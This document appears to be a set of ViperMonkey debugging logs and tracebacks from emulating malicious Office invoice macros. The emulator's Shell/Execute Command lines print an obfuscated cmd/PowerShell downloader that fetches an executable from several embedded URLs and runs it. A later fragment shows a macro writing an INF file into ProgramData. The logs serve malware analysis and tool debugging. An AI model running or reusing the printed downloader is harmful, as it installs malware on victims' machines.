WARNING  Function 'Format' not found
ERROR    chr() arg not in range(256)
ERROR    350988871 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    352674196 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    318547392 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    799 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    871 cannot be converted to ASCII.
INFO     calling Function: Format('C')
WARNING  Function 'Format' not found
INFO     calling Function: Format('c')
WARNING  Function 'Format' not found
INFO     calling Function: Format('c')
WARNING  Function 'Format' not found
INFO     calling Function: Format('"')
WARNING  Function 'Format' not found
ERROR    chr() arg not in range(256)
ERROR    462538301 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    225457549 cannot be converted to ASCII.
WARNING  Variable 'KZbIqrscsDqR' not found
WARNING  Variable 'nqLzrRwnOzbkp' not found
INFO     calling Function: Format(0)
WARNING  Function 'Format' not found
INFO     Calling Procedure: Shell('["md /V:/^s^et l^e=  ^   ^  ^ ^         ^}}^{h^t^a^};^k^a^er^b^;ia^$^ me^tI^-ek^...')
INFO     Shell("md /V:/^s^et l^e=  ^   ^  ^ ^         ^}}^{h^t^a^};^k^a^er^b^;ia^$^ me^tI^-ek^ovn^I^;)ia^$^ ,^j^p^X$(^eliF^d^a^o^lnw^o^D.^w^u^I${^yrt^{)ZXn$ ni^ ^j^pX$(h^a^er^of^;'^e^xe.'^+^O^U^I$+^'^\\^'+^i^lbup:vne$^=^ia$^;^'093'^ ^= O^UI$^;)'@'(tilp^S^.'J2b6^B/^tn^etno^-^pw/r^k^.o^.^y^ar^t^i//^:p^tth@A^A57^Bj/ur.i^t^si^go^lk^ta//^:^pt^th@l^0^k5/^s^da^o^l^pu/tne^tno-pw/ra^.u^d^e^.pl^u.sa^moi^d^ie^dotut^itsn^i//^:^p^t^th@4p2u^Z01/^m^o.^ov^it^isopro^lav//:^ptt^h^@j^A^M^2U/^ur^.ely^t^snusbd//^:ptth'^=^Z^Xn$^;^tneilbeW.^teN^ t^e^jbo-^wen=^w^u^I^$^ ^l^l^eh^sr^ewo^p&&^f^or /^L %^W ^in (^396^;-^1;^0)d^o ^s^e^t ^MG^U=!^MG^U!!l^e:~%^W,1!&&^i^f %^W e^q^u ^0 ^a^l^l %^MG^U:^*^M^G^U!^=%")
INFO     ACTION: Execute Command - params "md /V:/^s^et l^e=  ^   ^  ^ ^         ^}}^{h^t^a^};^k^a^er^b^;ia^$^ me^tI^-ek^ovn^I^;)ia^$^ ,^j^p^X$(^eliF^d^a^o^lnw^o^D.^w^u^I${^yrt^{)ZXn$ ni^ ^j^pX$(h^a^er^of^;'^e^xe.'^+^O^U^I$+^'^\\^'+^i^lbup:vne$^=^ia$^;^'093'^ ^= O^UI$^;)'@'(tilp^S^.'J2b6^B/^tn^etno^-^pw/r^k^.o^.^y^ar^t^i//^:p^tth@A^A57^Bj/ur.i^t^si^go^lk^ta//^:^pt^th@l^0^k5/^s^da^o^l^pu/tne^tno-pw/ra^.u^d^e^.pl^u.sa^moi^d^ie^dotut^itsn^i//^:^p^t^th@4p2u^Z01/^m^o.^ov^it^isopro^lav//:^ptt^h^@j^A^M^2U/^ur^.ely^t^snusbd//^:ptth'^=^Z^Xn$^;^tneilbeW.^teN^ t^e^jbo-^wen=^w^u^I^$^ ^l^l^eh^sr^ewo^p&&^f^or /^L %^W ^in (^396^;-^1;^0)d^o ^s^e^t ^MG^U=!^MG^U!!l^e:~%^W,1!&&^i^f %^W e^q^u ^0 ^a^l^l %^MG^U:^*^M^G^U!^=%" - Shell function
ERROR    chr() arg not in range(256)
ERROR    6913 cannot be converted to ASCII.
Recorded Actions:
+-------------------+---------------------------+----------------+
| Action            | Parameters                | Description    |
+-------------------+---------------------------+----------------+
| Found Entry Point | autoopen                  |                |
| Execute Command   | md /V:/^s^et l^e=  ^   ^  | Shell function |
|                   | ^ ^         ^}}^{h^t^a^}; |                |
|                   | ^k^a^er^b^;ia^$^          |                |
|                   | me^tI^-ek^ovn^I^;)ia^$^ , |                |
|                   | ^j^p^X$(^eliF^d^a^o^lnw^o |                |
|                   | ^D.^w^u^I${^yrt^{)ZXn$    |                |
|                   | ni^ ^j^pX$(h^a^er^of^;'^e |                |
|                   | ^xe.'^+^O^U^I$+^'^\^'+^i^ |                |
|                   | lbup:vne$^=^ia$^;^'093'^  |                |
|                   | ^= O^UI$^;)'@'(tilp^S^.'J |                |
|                   | 2b6^B/^tn^etno^-^pw/r^k^. |                |
|                   | o^.^y^ar^t^i//^:p^tth@A^A |                |
|                   | 57^Bj/ur.i^t^si^go^lk^ta/ |                |
|                   | /^:^pt^th@l^0^k5/^s^da^o^ |                |
|                   | l^pu/tne^tno-pw/ra^.u^d^e |                |
|                   | ^.pl^u.sa^moi^d^ie^dotut^ |                |
|                   | itsn^i//^:^p^t^th@4p2u^Z0 |                |
|                   | 1/^m^o.^ov^it^isopro^lav/ |                |
|                   | /:^ptt^h^@j^A^M^2U/^ur^.e |                |
|                   | ly^t^snusbd//^:ptth'^=^Z^ |                |
|                   | Xn$^;^tneilbeW.^teN^      |                |
|                   | t^e^jbo-^wen=^w^u^I^$^    |                |
|                   | ^l^l^eh^sr^ewo^p&&^f^or   |                |
|                   | /^L %^W ^in               |                |
|                   | (^396^;-^1;^0)d^o ^s^e^t  |                |
|                   | ^MG^U=!^MG^U!!l^e:~%^W,1! |                |
|                   | &&^i^f %^W e^q^u ^0       |                |
|                   | ^a^l^l                    |                |
|                   | %^MG^U:^*^M^G^U!^=%       |                |
+-------------------+---------------------------+----------------+

Recorded Actions:
Traceback (most recent call last):
  File "c:\python27\lib\site-packages\vipermonkey\vmonkey.py", line 404, in process_file
    print(vm.dump_actions())
  File "c:\python27\lib\site-packages\prettytable.py", line 240, in __str__
    return self.__unicode__().encode(self.encoding)
  File "c:\python27\lib\site-packages\prettytable.py", line 243, in __unicode__
    return self.get_string()
  File "c:\python27\lib\site-packages\prettytable.py", line 987, in get_string
    formatted_rows = self._format_rows(rows, options)
  File "c:\python27\lib\site-packages\prettytable.py", line 942, in _format_rows
    return [self._format_row(row, options) for row in rows]
  File "c:\python27\lib\site-packages\prettytable.py", line 939, in _format_row
    return [self._format_value(field, value) for (field, value) in zip(self._field_names, row)]
  File "c:\python27\lib\site-packages\prettytable.py", line 890, in _format_value
    return self._unicode(value)
  File "c:\python27\lib\site-packages\prettytable.py", line 181, in _unicode
    value = unicode(value, self.encoding, "strict")
  File "c:\python27\lib\encodings\utf_8.py", line 16, in decode
    return codecs.utf_8_decode(input, errors, True)
UnicodeDecodeError: 'utf8' codec can't decode byte 0x94 in position 127: invalid start byte

Traceback (most recent call last):
  File ".\vmonkey.py", line 103, in <module>
    from oletools.olevba import VBA_Parser, filter_vba
  File "C:\Users\xxx\Desktop\tools\pythonSW\PythonOld\lib\site-packages\oletools\olevba.py", line 300, in <module>
    from oletools import rtfobj
  File "C:\Users\xxx\Desktop\tools\pythonSW\PythonOld\lib\site-packages\oletools\rtfobj.py", line 121, in <module>
    from oletools.thirdparty.tablestream import tablestream
  File "C:\Users\xxx\Desktop\tools\pythonSW\PythonOld\lib\site-packages\oletools\thirdparty\tablestream\tablestream.py", line 82, in <module>
    import colorclass
  File "C:\Users\xxx\Desktop\tools\pythonSW\PythonOld\lib\site-packages\oletools\thirdparty\colorclass\__init__.py", line 11, in <module>
    from colorclass.codes import list_tags  # noqa
ImportError: No module named codes

>vmonkey "New invoice 4M087877.doc.zip" -z infected
 _    ___                 __  ___            __
| |  / (_)___  ___  _____/  |/  /___  ____  / /_____  __  __
| | / / / __ \/ _ \/ ___/ /|_/ / __ \/ __ \/ //_/ _ \/ / / /
| |/ / / /_/ /  __/ /  / /  / / /_/ / / / / ,< /  __/ /_/ /
|___/_/ .___/\___/_/  /_/  /_/\____/_/ /_/_/|_|\___/\__, /
     /_/                                           /____/
vmonkey 0.07 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues

===============================================================================
FILE: New invoice 4M087877.doc in New invoice 4M087877.doc.zip
ERROR    Reading in metadata failed. [Errno 2] No such file or directory: 'New invoice 4M087877.doc'
ERROR    Reading in file as Excel failed. [Errno 2] No such file or directory: 'New invoice 4M087877.doc'
-------------------------------------------------------------------------------
VBA MACRO fqccqJYYpXCuhi.cls
in file: New invoice 4M087877.doc - OLE stream: u'Macros/VBA/fqccqJYYpXCuhi'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[...]
ERROR    Cannot read document variables. [Errno 2] No such file or directory: 'New invoice 4M087877.doc'
ERROR    Cannot read custom doc properties. [Errno 2] No such file or directory: 'New invoice 4M087877.doc'
ERROR    Cannot read document text from New invoice 4M087877.doc. [Errno 2] No such file or directory: 'New invoice 4M087877.doc'

    decimal_literal = Regex(r"\d+[%&^]?").setParseAction(lambda t:int(t[0].rstrip("%&^"))).setName('decimal_literal')
    octal_literal = Regex(r"&[oO][0-7]+[%&^]?").setParseAction(lambda t:int(t[0][2:].rstrip("%&^"), 8)).setName('decimal_literal')
    hex_literal = Regex(r"&[hH][0-9a-fA-F]+[%&^]?").setParseAction(lambda t:int(t[0][2:].rstrip("%&^"), 16)).setName('decimal_literal')

TRACING VBA CODE (entrypoint = Auto*):
INFO     ACTION: Found Entry Point - params 'document_open' - 
INFO     evaluating Sub Document_open
WARNING  Variable 'IHLqsQXuiXFKJAfSwJF' not found
WARNING  Variable 'HGUhvqSdZdmpItfnMQ' not found
WARNING  Variable 'BLkIKAsQYliSmBzjNbMVsVv' not found
WARNING  Variable 'ARcoFzOaDwBFuiVKHisonKIU' not found
WARNING  Variable 'qKfcSRJGtsdcKz' not found
WARNING  Variable 'BTLBQCLmccAvmzIV' not found
WARNING  Variable 'zJiNQoMptPUvfhVZFAUvQr' not found
WARNING  Variable 'PJrOIZsqbwTjwnzwF' not found
INFO     calling Function: Shapes('zTnWboDjz')
INFO     Looking up doc var shapes('ztnwbodjz').textframe
WARNING  Variable 'jYwhGpospcJhTCQICNLDYTiw' not found
INFO     Looking up doc var kqshztn.containingrange
WARNING  Variable 'fbvuwib' not found
WARNING  Variable 'UcmjJE' not found
WARNING  Variable 'qXHBh' not found
WARNING  Variable 'KVVVQoFw' not found
WARNING  Variable 'BzpHpla' not found
WARNING  Variable 'aFQsUEr' not found
WARNING  Variable 'idLnl' not found
WARNING  Variable 'vlNFC' not found
WARNING  Variable 'RLIBq' not found
WARNING  Variable 'DoiJb' not found
WARNING  Variable 'waHtfjE' not found
WARNING  Variable 'zbVzcnDwwoiqjDnUHQkT' not found
WARNING  Variable 'rzKnTXbpvNbwGbjEEJVBaBP' not found
WARNING  Variable 'lJTSWACZprkOSHCNhVTB' not found
WARNING  Variable 'TapSUSsHXiNHFzVpLu' not found
WARNING  Variable 'bMjiiU' not found
WARNING  Variable 'dOjutwL' not found
WARNING  Variable 'tmRQGMYr' not found
INFO     calling Function: Shell('KqShZtn.ContainingRange', 0)
INFO     Shell('KqShZtn.ContainingRange')
INFO     ACTION: Execute Command - params 'KqShZtn.ContainingRange' - Shell function
WARNING  Variable 'MumMhwRW' not found
INFO     calling Function: Array('NULL', 'NULL', 'NULL', 0, 'NULL')
WARNING  Variable 'jSzXLUGKWHsnmlGnfw' not found
Recorded Actions:
+-------------------+-------------------------+----------------+
| Action            | Parameters              | Description    |
+-------------------+-------------------------+----------------+
| Found Entry Point | document_open           |                |
| Execute Command   | KqShZtn.ContainingRange | Shell function |
+-------------------+-------------------------+----------------+

VBA Builtins Called: ['Array', 'Chr', 'Shapes', 'Shell']

        # Shell Constants
        ('vbHide', 0),
        ('vbNormalFocus', 1),
        ('vbMinimizedFocus.', 2),
        ('vbMaximizedFocus', 3),
        ('vbNormalNoFocus', 4),
        ('vbMinimizedNoFocus', 6),

INFO     Eval Params before calling Procedure: Shell$(([PSluscsHX + Chr(34) + BUVwivWCOGU + kRrNpFBYEu + muVjFaKPL + EEvZQVmhC + jkQVUNq + KJsnJq + EMjVc + qwbDQbnFMp + qLJkQ + SiNWTm + wOQjqJd + oWpWEKB + ZjTWZo + zVAEIAZc + HqjIPzsccL + zfbXDIAUCK + WTndRGr + oaFpKQnGph + uMrGThuWao + bDMhWESUDF + KrZDPjYCzwP + vKLVFV + OMsJPFQliiR + rXNTaBYiszK + YBMVcDwYHwP + hsNadAkBWi + jDRAVuUCWHr + DzhwwKmjVGP + kmXRYClNMqM + fwksZhl + WCYWnjw + ZIQdCsXkaW + ZrWSFV + uBzQDUTIr + LrBKZD + lUocPcMN + Gvofkth + LdSvCbDXJ + URtazUKn + NUYpuLm + DhzFi + QTluDIjmk + WqOzYRP + TitqiBiOjAf + zaphP + XSDSjF + QjvwdjDwL + mzvIBbDNuP + fTFir + LaXihUhMuE + mNtilLRO + KnaKDId + vWZCMK + dasMz + oapYEszoBMb + wUNHXolL + wAZKGbNpDNK + iRcJKTkWzK + pFCpNDOk + MKtNjjLa + kwMOiOqRv + YLzklaCjDo, 0], {}))
ERROR    Impossible to sum arguments of different types
INFO     Calling Procedure: Shell$([0, 0])
ERROR    Procedure 'Shell$' not found
Recorded Actions:
+--------+------------+-------------+
| Action | Parameters | Description |
+--------+------------+-------------+
+--------+------------+-------------+

Traceback (most recent call last):
  File "vmonkey.py", line 319, in process_file
    for (subfilename, stream_path, form_variables) in vba.extract_form_strings_extended():
AttributeError: 'VBA_Parser' object has no attribute 'extract_form_strings_extended'

-------------------------------------------------------------------------------
PARSING VBA CODE:
Module None

Private Type QEkuzinRWhPUgNzqXlLhMSYvHI: DmcfgZEbnpoKfUMVWmhkuEuqhLgMPw As Long: JRhVAdfHnjGJqZhgVQIxX As Long: rSYbcxCuiXxWxSllDvWHbHTqct As Long: gEYXaoxvmcKeChxhIFQC As Long: End Type: Private Type HlQRRmytCbMfFVvXyeGhnerWF: CrhVlVetNDAcbosudRmuRY As Long: sYHEoxAXpTwaSoGgKPUroGy As Long: iTLHNtUwgPkRXFjGPBCCJhq As Long: fuYwEnEbZfgGdDmVksgQkBqISRj As Long: ZfnJfdGAinanoOPEzLEJphh As Long: spKZVRkkVTgkmEeJjCMrDWbiogV As Long: ZfnJfdGAinanoOPEzLEJphhSize As Long: spKZVRkkVTgkmEeJjCMrDWbiogVSize As Long: ZfnJfdGAinanoOPEzLEJphhCountChars As Long: spKZVRkkVTgkmEeJjCMrDWbiogVCountChars As Long: sfcAepyfrwIaQSSZECZntsbH As Long: TLaCnKPQbSqsxRtypRZNnnTo As Long: gKeJXmuWxXRgZogwXSIGWCVs As Integer: CrhVlVetNDAcbosudRmuRYReserved2 As Integer: sYHEoxAXpTwaSoGgKPUroGy2 As Byte: hvtTXNAVBFpldXbJzBXiQmQHHAMfMy As Long: MaKlFtENCqZEgeJtfQFgcFX As Long: TqsKAKvLCqbNIvYUhQcnkP As Long: End Type
                                                                                                                                                                                          ^
Expected end of text (at char 186), (line:1, col:187)
Parse Error. Processing Aborted.

.
.
.
INFO     calling Function: QEh('C:\\ProgramData\\golangSource.htm', 'l')
INFO     calling Function: ERb('C:\\ProgramData\\golangSource.html', '[version]\r\nSignature =$chicago$\r\n\r\n...)
INFO     calling Function: CreateObject('Scripting.FileSystemObject')
INFO     ACTION: CreateObject - params ['Scripting.FileSystemObject'] - Interesting Function Call
INFO     calling Function: CreateTextFile('C:\\ProgramData\\golangSource.html', True, True)
INFO     ACTION: CreateTextFile - params ['C:\\ProgramData\\golangSource.html', True, True] - Interesting Function Call
INFO     calling Function: Write('[version]\r\nSignature =$chicago$\r\n\r\n[golangSource]\r\nUnRegisterOCXs = Eve...)
ERROR    Cannot process Write(). Too many open files.

Segmentation fault (core dumped)

DEBUG    parsed Procedure Call: CreateObject(([JTCKC('64N63S')], {}))
DEBUG    saving func decl: 'JTCKC'
Module None
  Function JTCKC ([RBMCBAT]): 3 statement(s)

Private Sub Document_Open() 'JbRney0GnDXL catHu8ErP130RtVq lk wR wc
^
Expected end of text (at char 710), (line:15, col:1)

DEBUG    Parsing line 21: If Err.Number > 0 Then 'bOtz8ghmjsUkiwuDl a1 6 5848 eRKUx
DEBUG    line_keywords: ['if', 'err.number', "> 0 then 'botz8ghmjsukiwudl a1 6 5848 erkux\n"]
*** PARSING ERROR (3) ***
If Err.Number > 0 Then 'bOtz8ghmjsUkiwuDl a1 6 5848 eRKUx